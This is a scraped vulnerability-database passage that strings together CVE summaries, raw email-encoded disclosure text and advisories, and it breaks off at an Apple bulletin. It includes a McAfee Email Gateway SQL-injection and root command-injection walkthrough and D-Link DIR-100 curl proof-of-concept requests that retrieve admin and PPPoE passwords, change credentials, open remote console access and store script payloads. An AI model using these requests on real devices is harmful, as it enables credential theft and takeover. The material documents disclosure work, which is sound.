<p class=3D"">Referer: <a href=3D"https://172.31.16.87:10443/admin/969bf547=
d36f6c7e4302952cf72a5ce3/en_US/html/index.html">https://172.31.16.87:10443/=
admin/969bf547d36f6c7e4302952cf72a5ce3/en_US/html/index.html</a></p>
<p class=3D"">Content-Length: 626</p>
<p class=3D"">Cookie:
SCMUserSettings=3DlastUser%3Dusername%26popcheck%3D1%26lang%3Den_US%26last_=
page_id%3Ddashboard;
SHOW_BANNER_NOTICE=3DBannerShown%3D1;
ws_session=3DSID%3D616BF3CC-DA8B-401D-9220-ACED9A0FCD86</p>
<p class=3D"">Connection: keep-alive</p>
<p class=3D"">Pragma: no-cache</p>
<p class=3D"">Cache-Control: no-cache</p>
<p class=3D"">=A0</p>
<p class=3D"">{"id":"loadreport","locale":&qu=
ot;en_US","commands":[{"name":"getDDSData&quo=
t;,"args":{"what":["events"],"filters&qu=
ot;:{"filter_period":"week","start_date":&quo=
t;Now","event_type":"ui_events","event_id&quo=
t;:"all","reason":"all"},"date_range&quo=
t;:"week","events_col":"edate","events_o=
rder":"DESC","events_offset":0,"events_nitems=
":50,"tz":480,"start_date":1385491876.405,"is=
_mail":false,"itemized_nitems":10,"itemized_offset"=
;:0,"emailstatus_nitems":50,"emailstatus_offset":0,&quo=
t;emailstatus_col":"edate","emailstatus_order":&qu=
ot;DESC","dig_filters":[],"dig_category":"&qu=
ot;,"dig_summarize":true,"init":true,"type":&=
quot;ui_events"}}],"filterType":"system","aut=
oconv":1}</p>
<p class=3D"">=A0</p>
<p class=3D"">Within the above request, the events_col, event_id, reason,
events_order, emailstatus_order, and emailstatus_col JSON keys are vulnerab=
le
to SQL injection. You can capture the request with burpsuite and alter each
value by adding an apostrophe to view the SQL error in the response. You ca=
n
also use SQLmap to try various techniques for exploitability.</p>
<p class=3D"">=A0</p>
<p class=3D"">------------------------------------------------------</p>
<p class=3D"">=A0</p>
<p class=3D"">Many remote command execution vulnerabilities exist for
administrator users. Every vector I found was being run as the root user an=
d
they all exists within a single request. As an administrator, go to the Sys=
tem
tab in the top menu. You will be presented with general server settings. Re=
move
the last letter of the hostname, and replace it back. You will now have a g=
reen
checkmark in the top right of the web application. Click this, then click O=
K on
the dialog that pops up in the web app. The next captured request will be t=
he
request susceptible to command execution. It is a very large request with X=
ML
contained in JSON. Because this makes sense.</p>
<p class=3D"">=A0</p>
<p class=3D"">Within this XML, you may search for any XML element whose
=93name=94 attribute contains TestFile. Any of these elements are susceptib=
le to
command injection within the =93value=94 attribute. These filenames seems t=
o be
passed to a utility like =91test=92 to ensure whether or not it exists. By =
using shell
metacharacters, you can execute arbitrary commands on the system as root.</=
p>
<p class=3D"">=A0</p>
<p class=3D"">The hostname within this request is also susceptible to
command injection via shell metacharacters.</p>
<p class=3D"">=A0</p>
<p class=3D"">You may also search for any XML element called Command. Each
of these elements contains a small command to be run on a given event. You =
may
alter any of these to be run as root.</p>
<p class=3D"">=A0</p>
<p class=3D"">You may also search for an XML element called Script. This is
used to manage the cron jobs (make sure the corresponding Enabled element i=
s
set to =931=94 instead of =930=94). You may alter or create any cron jobs t=
hat will be
run as root.</p><div><br></div>-- <br><a href=3D"http://volatile-minds.blog=
spot.com">http://volatile-minds.blogspot.com</a> -- blog<br><a href=3D"http=
://www.volatileminds.net">http://www.volatileminds.net</a> -- website
</div>
--047d7bd6c5d012977c04eca87ee7--
| VAR-201312-0309 | CVE-2013-7092 | McAfee Email Gateway of /admin/cgi-bin/rpc/doReport/18 In SQL Injection vulnerability |
CVSS V2: 6.5 CVSS V3: - Severity: MEDIUM |
Multiple SQL injection vulnerabilities in /admin/cgi-bin/rpc/doReport/18 in McAfee Email Gateway 7.6 allow remote authenticated users to execute arbitrary SQL commands via the (1) events_col, (2) event_id, (3) reason, (4) events_order, (5) emailstatus_order, or (6) emailstatus_col JSON keys. (1) events_col (2) event_id (3) reason (4) events_order (5) emailstatus_order (6) emailstatus_col.
Exploiting these issues could allow an attacker to execute arbitrary command, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. McAfee Email Gateway (MEG) is a suite of email security solutions from McAfee. The solution offers incoming threat protection, outgoing encryption, data loss prevention, and more. A SQL injection vulnerability exists in /admin/cgi-bin/rpc/doReport/18 in MEG version 7.6. Other techniques available are error-based, time-based, and
boolean-based injections.
Several remote command execution vulnerabilities were found as an
administrator which are run as the local root user. By utilising the SQL
injections as an unprivileged user, a user can escalate privileges by
updating the password hash of an admin, and ultimately run commands on the
server as root.
However, no data seems to be able to be exfiltrated via the command
injections. You may receive a connect back, but no commands can be run over
the connect-back. My solution to this was to pipe the results of commands
into a file in /tmp, then use the SQL injections to read the file from the
FS and return the results.
---------------------------------------------------
As a read-only user with reporting capabilities, many SQL injection vectors
exist when creating new reports based on filters. You can get to this part
of the web app by clicking the Reports menu item at the top-center. The
following request contains four exploitable SQL injections each exploitable
via a few different techniques:
POST /admin/cgi-bin/rpc/doReport/18 HTTP/1.1
Host: 172.31.16.87:10443
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:25.0) Gecko/20100101
Firefox/25.0
Accept: text/html,application/xhtml+xml,application/xml;q=3D0.9,*/*;q=3D0.8
Accept-Language: en-US,en;q=3D0.5
Accept-Encoding: gzip, deflate
Content-Type: text/plain; charset=3DUTF-8
Referer:
https://172.31.16.87:10443/admin/969bf547d36f6c7e4302952cf72a5ce3/en_US/htm=
l/index.html
Content-Length: 626
Cookie:
SCMUserSettings=3DlastUser%3Dusername%26popcheck%3D1%26lang%3Den_US%26last_=
page_id%3Ddashboard;
SHOW_BANNER_NOTICE=3DBannerShown%3D1;
ws_session=3DSID%3D616BF3CC-DA8B-401D-9220-ACED9A0FCD86
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
{"id":"loadreport","locale":"en_US","commands":[{"name":"getDDSData","args"=
:{"what":["events"],"filters":{"filter_period":"week","start_date":"Now","e=
vent_type":"ui_events","event_id":"all","reason":"all"},"date_range":"week"=
,"events_col":"edate","events_order":"DESC","events_offset":0,"events_nitem=
s":50,"tz":480,"start_date":1385491876.405,"is_mail":false,"itemized_nitems=
":10,"itemized_offset":0,"emailstatus_nitems":50,"emailstatus_offset":0,"em=
ailstatus_col":"edate","emailstatus_order":"DESC","dig_filters":[],"dig_cat=
egory":"","dig_summarize":true,"init":true,"type":"ui_events"}}],"filterTyp=
e":"system","autoconv":1}
Within the above request, the events_col, event_id, reason, events_order,
emailstatus_order, and emailstatus_col JSON keys are vulnerable to SQL
injection. You can capture the request with burpsuite and alter each value
by adding an apostrophe to view the SQL error in the response. You can also
use SQLmap to try various techniques for exploitability.
------------------------------------------------------
Many remote command execution vulnerabilities exist for administrator
users. Every vector I found was being run as the root user and they all
exists within a single request. As an administrator, go to the System tab
in the top menu. You will be presented with general server settings. Remove
the last letter of the hostname, and replace it back. You will now have a
green checkmark in the top right of the web application. Click this, then
click OK on the dialog that pops up in the web app. The next captured
request will be the request susceptible to command execution. It is a very
large request with XML contained in JSON. Because this makes sense.
Within this XML, you may search for any XML element whose =93name=94 attrib=
ute
contains TestFile. Any of these elements are susceptible to command
injection within the =93value=94 attribute. These filenames seems to be pas=
sed
to a utility like =91test=92 to ensure whether or not it exists. By using s=
hell
metacharacters, you can execute arbitrary commands on the system as root.
The hostname within this request is also susceptible to command injection
via shell metacharacters.
You may also search for any XML element called Command. Each of these
elements contains a small command to be run on a given event. You may alter
any of these to be run as root.
You may also search for an XML element called Script. This is used to
manage the cron jobs (make sure the corresponding Enabled element is set to
=931=94 instead of =930=94). You may alter or create any cron jobs that wil=
l be run
as root.
--=20
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
--047d7bd6c5d012977c04eca87ee7
Content-Type: text/html; charset=windows-1252
Content-Transfer-Encoding: quoted-printable
<div dir=3D"ltr"><p class=3D"">McAfee Email Gateway 7.6 multiple vulnerabil=
ities</p>
<p class=3D""><a href=3D"http://www.mcafee.com/us/products/email-gateway.as=
px">http</a><a href=3D"http://www.mcafee.com/us/products/email-gateway.aspx=
">://</a><a href=3D"http://www.mcafee.com/us/products/email-gateway.aspx">w=
ww</a><a href=3D"http://www.mcafee.com/us/products/email-gateway.aspx">.</a=
><a href=3D"http://www.mcafee.com/us/products/email-gateway.aspx">mcafee</a=
><a href=3D"http://www.mcafee.com/us/products/email-gateway.aspx">.</a><a h=
ref=3D"http://www.mcafee.com/us/products/email-gateway.aspx">com</a><a href=
=3D"http://www.mcafee.com/us/products/email-gateway.aspx">/</a><a href=3D"h=
ttp://www.mcafee.com/us/products/email-gateway.aspx">us</a><a href=3D"http:=
//www.mcafee.com/us/products/email-gateway.aspx">/</a><a href=3D"http://www=
.mcafee.com/us/products/email-gateway.aspx">products</a><a href=3D"http://w=
ww.mcafee.com/us/products/email-gateway.aspx">/</a><a href=3D"http://www.mc=
afee.com/us/products/email-gateway.aspx">email</a><a href=3D"http://www.mca=
fee.com/us/products/email-gateway.aspx">-</a><a href=3D"http://www.mcafee.c=
om/us/products/email-gateway.aspx">gateway</a><a href=3D"http://www.mcafee.=
com/us/products/email-gateway.aspx">.</a><a href=3D"http://www.mcafee.com/u=
s/products/email-gateway.aspx">aspx</a> -- Has free trial</p>
<p class=3D"">=A0</p>
<p class=3D"">Many instances of SQL injection were found as an unprivileged
read-only authenticated user that allow the user to completely take over th=
e accounts of
other users by using a stacked injection technique to run UPDATE statements=
.
Other techniques available are error-based, time-based, and boolean-based
injections.</p>
<p class=3D"">=A0</p>
<p class=3D"">Several remote command execution vulnerabilities were found
as an administrator which are run as the local root user. By utilising the =
SQL
injections as an unprivileged user, a user can escalate privileges by updat=
ing
the password hash of an admin, and ultimately run commands on the server as
root.</p>
<p class=3D"">=A0</p>
<p class=3D"">However, no data seems to be able to be exfiltrated via the
command injections. You may receive a connect back, but no commands can be =
run
over the connect-back. My solution to this was to pipe the results of comma=
nds
into a file in /tmp, then use the SQL injections to read the file from the =
FS
and return the results.</p>
<p class=3D"">=A0</p>
<p class=3D"">---------------------------------------------------</p>
<p class=3D"">=A0</p>
<p class=3D"">As a read-only user with reporting capabilities, many SQL
injection vectors exist when creating new reports based on filters. You can=
get
to this part of the web app by clicking the Reports menu item at the top-ce=
nter.
The following request contains four exploitable SQL injections each exploit=
able
via a few different techniques:</p>
<p class=3D"">=A0</p>
<p class=3D"">POST /admin/cgi-bin/rpc/doReport/18 HTTP/1.1</p>
<p class=3D"">Host: <a href=3D"http://172.31.16.87:10443">172.31.16.87:1044=
3</a></p>
<p class=3D"">User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:25.0)
Gecko/20100101 Firefox/25.0</p>
<p class=3D"">Accept:
text/html,application/xhtml+xml,application/xml;q=3D0.9,*/*;q=3D0.8</p>
<p class=3D"">Accept-Language: en-US,en;q=3D0.5</p>
<p class=3D"">Accept-Encoding: gzip, deflate</p>
<p class=3D"">Content-Type: text/plain; charset=3DUTF-8</p>
<p class=3D"">Referer: <a href=3D"https://172.31.16.87:10443/admin/969bf547=
d36f6c7e4302952cf72a5ce3/en_US/html/index.html">https://172.31.16.87:10443/=
admin/969bf547d36f6c7e4302952cf72a5ce3/en_US/html/index.html</a></p>
<p class=3D"">Content-Length: 626</p>
<p class=3D"">Cookie:
SCMUserSettings=3DlastUser%3Dusername%26popcheck%3D1%26lang%3Den_US%26last_=
page_id%3Ddashboard;
SHOW_BANNER_NOTICE=3DBannerShown%3D1;
ws_session=3DSID%3D616BF3CC-DA8B-401D-9220-ACED9A0FCD86</p>
<p class=3D"">Connection: keep-alive</p>
<p class=3D"">Pragma: no-cache</p>
<p class=3D"">Cache-Control: no-cache</p>
<p class=3D"">=A0</p>
<p class=3D"">{"id":"loadreport","locale":&qu=
ot;en_US","commands":[{"name":"getDDSData&quo=
t;,"args":{"what":["events"],"filters&qu=
ot;:{"filter_period":"week","start_date":&quo=
t;Now","event_type":"ui_events","event_id&quo=
t;:"all","reason":"all"},"date_range&quo=
t;:"week","events_col":"edate","events_o=
rder":"DESC","events_offset":0,"events_nitems=
":50,"tz":480,"start_date":1385491876.405,"is=
_mail":false,"itemized_nitems":10,"itemized_offset"=
;:0,"emailstatus_nitems":50,"emailstatus_offset":0,&quo=
t;emailstatus_col":"edate","emailstatus_order":&qu=
ot;DESC","dig_filters":[],"dig_category":"&qu=
ot;,"dig_summarize":true,"init":true,"type":&=
quot;ui_events"}}],"filterType":"system","aut=
oconv":1}</p>
<p class=3D"">=A0</p>
<p class=3D"">Within the above request, the events_col, event_id, reason,
events_order, emailstatus_order, and emailstatus_col JSON keys are vulnerab=
le
to SQL injection. You can capture the request with burpsuite and alter each
value by adding an apostrophe to view the SQL error in the response. You ca=
n
also use SQLmap to try various techniques for exploitability.</p>
<p class=3D"">=A0</p>
<p class=3D"">------------------------------------------------------</p>
<p class=3D"">=A0</p>
<p class=3D"">Many remote command execution vulnerabilities exist for
administrator users. Every vector I found was being run as the root user an=
d
they all exists within a single request. As an administrator, go to the Sys=
tem
tab in the top menu. You will be presented with general server settings. Re=
move
the last letter of the hostname, and replace it back. You will now have a g=
reen
checkmark in the top right of the web application. Click this, then click O=
K on
the dialog that pops up in the web app. The next captured request will be t=
he
request susceptible to command execution. It is a very large request with X=
ML
contained in JSON. Because this makes sense.</p>
<p class=3D"">=A0</p>
<p class=3D"">Within this XML, you may search for any XML element whose
=93name=94 attribute contains TestFile. Any of these elements are susceptib=
le to
command injection within the =93value=94 attribute. These filenames seems t=
o be
passed to a utility like =91test=92 to ensure whether or not it exists. By =
using shell
metacharacters, you can execute arbitrary commands on the system as root.</=
p>
<p class=3D"">=A0</p>
<p class=3D"">The hostname within this request is also susceptible to
command injection via shell metacharacters.</p>
<p class=3D"">=A0</p>
<p class=3D"">You may also search for any XML element called Command. Each
of these elements contains a small command to be run on a given event. You =
may
alter any of these to be run as root.</p>
<p class=3D"">=A0</p>
<p class=3D"">You may also search for an XML element called Script. This is
used to manage the cron jobs (make sure the corresponding Enabled element i=
s
set to =931=94 instead of =930=94). You may alter or create any cron jobs t=
hat will be
run as root.</p><div><br></div>-- <br><a href=3D"http://volatile-minds.blog=
spot.com">http://volatile-minds.blogspot.com</a> -- blog<br><a href=3D"http=
://www.volatileminds.net">http://www.volatileminds.net</a> -- website
</div>
--047d7bd6c5d012977c04eca87ee7--
| VAR-201312-0068 | CVE-2013-2825 | Linux Kernel Base of Director Industrial Communication Gateway Device Outstation Component DNP3 Service disruption in services (DoS) Vulnerabilities |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
The DNP3 service in the Outstation component on Elecsys Director Gateway devices with kernel 2.6.32.11ael1 and earlier allows remote attackers to cause a denial of service (CPU consumption and communication outage) via crafted input. Elecsys Director Gateway is prone to a remote denial-of-service vulnerability.
Attackers can exploit this issue to cause denial-of-service conditions. Elecsys Director Industrial Communication Gateway is a set of industrial data communication gateway equipment of Elecsys Company in the United States. The device provides functions such as data acquisition, automatic communication failover, network security, bandwidth management, protocol conversion, and more
| VAR-201312-0235 | CVE-2013-6690 | Cisco Prime Collaboration of Assurance Component Web Interface cross-site scripting vulnerability |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Multiple cross-site scripting (XSS) vulnerabilities in the web interface in the Assurance component in Cisco Prime Collaboration allow remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka Bug IDs CSCui92643, CSCui94038, and CSCui94161. Vendors have confirmed this vulnerability Bug ID CSCui92643 , CSCui94038 ,and CSCui94161 It is released as.By any third party Web Script or HTML May be inserted.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
This issue is being tracked by Cisco Bug ID CSCui92643, CSCui94038, and CSCui94161. Cisco Prime Collaboration is a set of enterprise collaboration network management solutions from Cisco. This solution supports simplified unified communication and video collaboration network management through a unified management console, and rapid deployment of communication sites. The vulnerability stems from the fact that the page does not adequately sanitize user input. A remote attacker can exploit this vulnerability to inject arbitrary code or HTML, and obtain the user's access credentials
| VAR-201312-0452 | CVE-2013-6703 | Cisco ONS 15454 Controller card TLS/SSLv3 Service disruption in modules (DoS) Vulnerabilities |
CVSS V2: 7.1 CVSS V3: - Severity: HIGH |
The TLS/SSLv3 module on Cisco ONS 15454 controller cards allows remote attackers to cause a denial of service (card reset) via crafted (1) TLS or (2) SSLv3 packets, aka Bug ID CSCuh34787.
An attacker can exploit this issue to cause the control card to reset, denying service to legitimate users.
This issue is being tracked by Cisco bug ID CSCuh34787. Cisco ONS 15454 is a set of optical network multi-service transmission platform of American Cisco (Cisco). The platform leverages optical transport technologies such as Resilient Packet Ring (RPR), SDH, and DWDM/CWDM to integrate Ethernet, IP, storage, and TDM services to deliver next-generation voice, data services, and more. Controller Cards is one of the control cards. The vulnerability is caused by the program not properly filtering TLS/SSLv3 packets
| VAR-201312-0453 | CVE-2013-6704 | Cisco IOS XE Service disruption in (DoS) Vulnerabilities |
CVSS V2: 7.1 CVSS V3: - Severity: HIGH |
Cisco IOS XE does not properly manage memory for TFTP UDP flows, which allows remote attackers to cause a denial of service (memory consumption) via TFTP (1) client or (2) server traffic, aka Bug IDs CSCuh09324 and CSCty42686. Cisco IOS is the interconnected network operating system used on most Cisco system routers and network switches. A denial of service vulnerability exists in Cisco IOS XE Software. An attacker can exploit the vulnerability to consume excess memory and cause the device to crash, denying service to legitimate users.
This issue is being tracked by Cisco Bug ID CSCuh09324 and CSCty42686. The vulnerability is caused by the program not properly freeing memory
| VAR-201312-0454 | CVE-2013-6705 | Cisco IOS and IOS XE of IP Device Tracking Service disruption in functionality (DoS) Vulnerabilities |
CVSS V2: 6.1 CVSS V3: - Severity: MEDIUM |
The IP Device Tracking (IPDT) feature in Cisco IOS and IOS XE allows remote attackers to cause a denial of service (IPDT AVL corruption and device reload) via a crafted sequence of ARP packets, aka Bug ID CSCuh38133. Cisco IOS is the interconnected network operating system used on most Cisco system routers and network switches. The vulnerability is due to IPDT AVL corruption. Sending a special ARP packet to the affected device can trigger the vulnerability and overload the device. Cisco IOS and IOS XE Software are prone to a remote denial-of-service vulnerability.
Successful exploits may allow attackers to cause the device to reload, denying service to legitimate users.
This issue is being tracked by Cisco Bug ID CSCuh38133
| VAR-202002-0670 | CVE-2013-7055 | D-Link DIR-100 Vulnerable to insufficient protection of credentials |
CVSS V2: 5.0 CVSS V3: 9.8 Severity: CRITICAL |
D-Link DIR-100 4.03B07 has PPTP and poe information disclosure. D-Link DIR-100 Contains a vulnerability related to insufficient protection of credentials.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. D-Link DIR-100 Ethernet Broadband Router is a broadband router device. The D-Link DIR-100 Ethernet Broadband Router fails to properly restrict special access to users, allowing remote attackers to exploit vulnerabilities without having to verify the submission request and obtain information such as PPTP, POE, and Dyndns username and password. D-Link DIR-100 is prone to the following security vulnerabilities:
1. An authentication-bypass vulnerability
2. Multiple information-disclosure vulnerabilities
3. A cross-site request-forgery vulnerability
4. A cross-site scripting vulnerability
An attacker can exploit these issues to execute HTML and arbitrary script code in the browser of an unsuspecting user in the context of the affected device, steal cookie-based authentication credentials, bypass-authentication mechanism, gain access to potentially sensitive information. Other attacks are also possible. * Title: Router D-Link DIR-100 Multiple Vulnerabilities
* Date: 2013-12-18
* Author: Felix Richter
* Contact: root@euer.krebsco.de
* Vulnerable Software: ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b07_ALL_de_20120410.zip
* Patched Software: ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b13_ALL_de_20131011.zip
* Report Version: 2.0
* Report URL: http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt
* Vulnerable: D-Link DIR-100
* Hardware Revision: D1
* Software Version: 4.03B07 (from 2012-04-10)
* CVE Numbers:
* CWE-287 Authentication Issues: CVE-2013-7051
* CWE-255 Issues with Credential Management: CVE-2013-7052
* CWE-352 Cross-Site Request Forgery: CVE-2013-7053
* CWE-79 Cross-Site Scripting: CVE-2013-7054
* CWE-200 Information Disclosure: CVE-2013-7055
* Google Dork: "D-Link Systems" inurl:bsc_internet.htm D1
* State: Patched by Vendor
* Link to Vendor Report: http://more.dlink.de/sicherheit/news.html#news8
# Table of Contents
1. Background
2. Technical Description
4. Severity and Remediation
5. Timeline
# 1. Background
The DIR-100 is designed for easy and robust connectivity among heterogeneous
standards-based network devices. Computers can communicate directly with this
router for automatic opening and closing of UDP/TCP ports to take full
advantage of the security provided without sacrificing functionality of on-line
applications.
# 2 Vulnerability Description
Multiple vulnerabilities have been found in the D-Link DIR-100 Ethernet
Broadband Router Revision D (and potentially other devices sharing the
affected firmware) that could allow a remote attacker:
- Retrieve the Administrator password without authentication leading to
authentication bypass [CWE-255]
- Retrieve sensitive configuration paramters like the pppoe username and
password without authentication [CWE-200]
- Execute privileged Commands without authentication through a race
condition leading to weak authentication enforcement [CWE-287]
- Sending formatted request to a victim which then will execute arbitrary
commands on the device (CSRF) [CWE-352]
- Store arbitrary javascript code which will be executed when a victim
accesses the administrator interface [CWE-79]
CVE-Numbers for these vulnerabilities has not yet been assigned.
# 3 Technical Description of the Vulnerabilities
## 3.0 The DIR-100 Web Interface and CGI
The DIR-100 Web interface provides a cgi-script on `/cliget.cgi` for
unauthenticated users and `/cli.cgi` for authenticated requests.
list of features provided by each cgi-script can be retrieved by:
curl 'http://192.168.1.104/cliget.cgi?cmd=help'
# and respectively when authenticated
curl 'http://192.168.1.104/cli.cgi?cmd=help'
## 3.1 Authentication Bypass
### Description
The administrator password is not protected in any way on the device, every
attacker with access to the administrator interface which listens on port 80.
For retrieving the Administrator password the request must not be
authenticated.
### Proof of Concept
The web interface provides two distinct ways to retrieve the adminstrator
password:
curl 'http://192.168.0.1/cliget.cgi?cmd=$sys_user1'
curl 'http://192.168.0.1/cliget.cgi?cmd=easysetup%20summary'
## 3.2 Weak Authentication
### Description
As soon as a user is logged into the administration interface, the cli CGI
is `unlocked` and can be used by without authenticating before as
the cgi-script does not check any other authentication parameters such as
cookies or HTTP Parameters. The only access check is if the IP-Address is
the same.
### Proof of Concept
# open the router interface in a web browser and log in
firefox 'http://192.168.0.1/'
# open a new terminal or another web-browser which is currently not logged
# in and try to access
curl 'http://192.168.0.1/cli.cgi?cmd=help'
# this request will be authenticated and it will not be redirected to the
# login page. If no user is logged in, the request will be redirected to
# the login
## 3.3 Retrieve sensitive information
### Description
Besides retrieving the administrator password without authentication it is
possible to retrieve other sensitive configuration from the device as well like
the PPTP and poe Username and Password, as well as the configured dyndns
username and password and configured mail log credentials when these parameters
are configured.
No authentication is requred.
### Proof of Concept
curl 'http://192.168.0.1/cliget.cgi?cmd=$ddns1'
curl 'http://192.168.0.1/cliget.cgi?cmd=$poe_user'
curl 'http://192.168.0.1/cliget.cgi?cmd=$poe_pass'
curl 'http://192.168.0.1/cliget.cgi?cmd=$pptp_user'
curl 'http://192.168.0.1/cliget.cgi?cmd=$pptp_pass'
curl 'http://192.168.0.1/cliget.cgi?cmd=$log_mail_user'
curl 'http://192.168.0.1/cliget.cgi?cmd=$log_mail_pwd'
## 3.4 Cross-Site Request Forgery (CSRF)
### Description
CSRF attacks can be launched by sending a formatted request to a victim, then
tricking the victim into loading the request (often automatically), which
makes it appear that the request came from the victim. As an example the
attacker could change the administrator password (see Proof of Concept code)
and enable system remote access.
### Proof of Concept
Changing the password for administrator can be done when the ip-address is
authenticated:
# Log into DIR-100
curl -X POST -d 'uname=admin&pws=password&login=Login' 'http://192.168.0.1/login.htm'
# Change password
curl 'http://192.168.0.1/cli.cgi?cmd=$sys_user1=user=admin&pass=c%;$sys_passHash=4%25;commit'
# enable remote console
curl 'http://192.168.0.1/cli.cgi?cmd=$sys_remote_enable=1%25;$sys_remote_ip=0.0.0.0%25;$sys_remote_port=80%25;commit'
## 3.5 Cross-Site Scripting (XSS)
### Description
It is possible for an authenticated user to store information on the server
which will not be checked on the server side for special characters which
results in persistent Cross-Site Scripting Vulnerabilities. With this
vulnerabilty the victim (administrator) will run javascript code in the
context of the D-Link DIR-100.
XSS is possible because only on the client side (javascript code) the input is
filtered and validated, sending data directly to the CGI scripts.
### Proof of Concept
# Log into DIR-100
curl -X POST -d 'uname=admin&pws=password&login=Login' 'http://192.168.0.1/login.htm'
# XSS in Static IP Address Tab
curl 'http://192.168.1.104/cli.cgi?cmd=dhcps%20set%20name=<script>alert(1)</script>%26ip=192.168.0.199%26mac=00:11:22:33:44:55%26flg=1%26exp='
# XSS in Scheduler tab
curl 'http://192.168.1.104/cli.cgi?cmd=$sched2=schen=1%26time=0-60%26day=5%26desc=<script>alert(1)</script>%26use=0%26idx=2%26;commit'
# 4 Severity and Remediation
This exploits are considered very critical, especially when the feature of remote
administration is activated on the system.
Weak authentication, together with cross-site request forgery and authentication
bypass can result in a full device compromise from an arbitrary website the victim is
accessing, even if the device has remote administration deactivated on the
internet-port. It is recommended to upgrade the router with the newest firmware
of the D-Link DIR-100.
# 5 Timeline
2013-09-13 - First Contact with D-Link Support
2013-09-19 - Sent Report
2013-10-14 - Request Status update, Response: Beta will be available mid October
2013-12-02 - Vendor publishes Firmware Update
2013-12-11 - Request CVE-IDs
2013-12-18 - Publish the report
| VAR-201401-0137 | CVE-2013-5987 | NVIDIA In graphics drivers GPU Vulnerability that can bypass access restrictions |
CVSS V2: 7.2 CVSS V3: - Severity: HIGH |
Unspecified vulnerability in NVIDIA graphics driver Release 331, 325, 319, 310, and 304 allows local users to bypass intended access restrictions for the GPU and gain privileges via unknown vectors. NVIDIA Graphics Drivers are prone to a local privilege-escalation vulnerability.
A local attacker may exploit this issue to gain escalated privileges and execute arbitrary code with escalated privileges. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c04036775
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c04036775
Version: 1
HPSBHF02946 rev.1 - HP Servers with NVIDIA GPU Computing Driver, Elevation of
Privilege
NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.
Release Date: 2014-05-09
Last Updated: 2014-05-09
Potential Security Impact: Elevation of privilege
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY
A potential security vulnerability has been identified with certain HP
servers that use NVIDIA Computing GPU processors. The vulnerability could be
exploited resulting in an elevation of privilege.
References: CVE-2013-5987, SSRT101355
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
Server
GPU type(s)
DL360 G7
Q4000
SL390s G7
M2050, M2070, M2070Q, M2075, M2090
DL160 Gen8
Q4000
ML350p Gen8
Q4000, Q6000
DL360e Gen8
Q4000
DL380e Gen8
Q4000, Q6000
SL250s Gen8
M2070Q, M2075, M2090, K10, K20, K20X
SL270s Gen8
M2070Q, M2075, M2090, K10, K20, K20X
BACKGROUND
CVSS 2.0 Base Metrics
===========================================================
Reference Base Vector Base Score
CVE-2013-5987 (AV:L/AC:M/Au:S/C:C/I:C/A:C) 6.6
===========================================================
Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002
The Hewlett-Packard Company thanks NVIDIA and Marcin Kocielnicki from the
X.Org Foundation Nouveau project for reporting this issue to
security-alert@hp.com.
RESOLUTION
HP has provided an updated NVIDIA firmware driver version that resolves the
security vulnerability. Download the firmware driver from hp.com
Go to support and drivers.
Search for the server model and then choose the operating system.
Select "Driver - NVIDIA Computing."
Note:
For Windows choose the Driver NVIDIA Computing v3.21.01 or a subsequent
version
For Linux choose the Driver NVIDIA Computing v3.19.72 or a subsequent version
HISTORY
Version:1 (rev.1) - 9 May 2014 Initial release
Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is
available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.
3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX
Copyright 2014 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors
or omissions contained herein. The information provided is provided "as is"
without warranty of any kind. To the extent permitted by law, neither HP or
its affiliates, subcontractors or suppliers will be liable for
incidental,special or consequential damages including downtime cost; lost
profits; damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice.
Hewlett-Packard Company and the names of Hewlett-Packard products referenced
herein are trademarks of Hewlett-Packard Company in the United States and
other countries. Other product and company names mentioned herein may be
trademarks of their respective owners.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.13 (GNU/Linux)
iEYEARECAAYFAlNtE/EACgkQ4B86/C0qfVmMDwCgoDqC5FS8nW8RTOHZAUUqCZIY
0uIAn0TrMahIzRFsCo6DfAc8/FsNsz6f
=mv1t
-----END PGP SIGNATURE-----
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
APPLE-SA-2014-02-25-1 OS X Mavericks 10.9.2 and Security Update
2014-001
OS X Mavericks 10.9.2 and Security Update 2014-001 is now available
and addresses the following:
Apache
